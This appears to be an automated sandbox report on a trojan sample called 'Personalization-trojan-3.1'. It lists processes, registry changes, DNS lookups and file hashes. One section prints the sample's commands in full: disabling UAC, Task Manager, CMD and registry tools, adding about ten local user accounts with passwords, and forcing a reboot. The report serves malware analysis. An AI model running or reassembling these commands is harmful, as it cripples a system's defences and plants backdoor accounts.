"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

137s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1716 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe C:\Windows\system32\cmd.exe
PID 1716 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 912 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1820 wrote to memory of 912 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E69.tmp\6E6A.tmp\6E6B.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\6E69.tmp\6E6A.tmp\6E6B.bat

MD5 4c46c91a5d1a43115e11db625f322414
SHA1 53c015fe4cf56784db8eaf28048d4cfae09ffa86
SHA256 91e88cdab236b8221194160b904c63899baac408596725153245ca8f39c29524
SHA512 a30ee881c718c2a90b5563f58dca470da353d5e3b7b1e74b0f0c777dd05adafc357a4363a1a0814b6889378c0f37d02e742ab2542f5ec18b3ffd5518285ecfda

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

104s

Max time network

105s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" C:\Windows\system32\reg.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4964 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe C:\Windows\system32\cmd.exe
PID 4964 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe C:\Windows\system32\cmd.exe
PID 316 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 316 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 316 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 316 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 316 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 316 wrote to memory of 4708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 316 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4556 wrote to memory of 4428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4556 wrote to memory of 4428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 2320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 2320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2320 wrote to memory of 3736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2320 wrote to memory of 3736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2276 wrote to memory of 2096 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2276 wrote to memory of 2096 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2928 wrote to memory of 1684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2928 wrote to memory of 1684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 352 wrote to memory of 2956 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 352 wrote to memory of 2956 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1516 wrote to memory of 2792 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1516 wrote to memory of 2792 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 2064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 2064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2064 wrote to memory of 4324 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2064 wrote to memory of 4324 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1656 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1656 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 3588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 3588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3588 wrote to memory of 4872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3588 wrote to memory of 4872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4272 wrote to memory of 3620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4272 wrote to memory of 3620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 4260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6A91.tmp\6A92.tmp\6A93.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\Web\winntcus64.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f

C:\Windows\system32\net.exe

net user /add NTCUS ntcus123

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTCUS ntcus123

C:\Windows\system32\net.exe

net user /add NTUSER ntcus124

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTUSER ntcus124

C:\Windows\system32\net.exe

net user /add NTDAT ntpersonalize

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTDAT ntpersonalize

C:\Windows\system32\net.exe

net user /add DC discord

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add DC discord

C:\Windows\system32\net.exe

net user /add cfs belgium

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add cfs belgium

C:\Windows\system32\net.exe

net user /add leopoldII belgium

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add leopoldII belgium

C:\Windows\system32\net.exe

net user /add SCHJIEAB rykn

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add SCHJIEAB rykn

C:\Windows\system32\net.exe

net user /add IZWYOKWYIEN rykn

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add IZWYOKWYIEN rykn

C:\Windows\system32\net.exe

net user /add asap asap

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add asap asap

C:\Windows\system32\net.exe

net user /add REICHTANGLE ig1

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add REICHTANGLE ig1

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v AccentColor /t REG_DWORD /d 0xFF0000 /f

C:\Windows\system32\shutdown.exe

shutdown /r /t 3 /c "XAXAXA"

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0 /state0:0xa3aea855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

C:\Users\Admin\AppData\Local\Temp\6A91.tmp\6A92.tmp\6A93.bat

MD5 7c9274396b81ebfe6570c3b6b962e91c
SHA1 d1768cf3a09cc3d652ae71fde70fc76d5c472b90
SHA256 c5c3916b24fb9aaeb3347e28d3f5ff555b06b4c631fcd779c57cdbac31c83f89
SHA512 a01a9db207e652a678d45919d306f2068fa6691fe8ed7e8d800f76c9fb9598b739926333283da7dfee187f4a7d57964075b1b8c90739057136b930791956cae3

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

135s

Max time network

136s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\user.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\user.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

N/A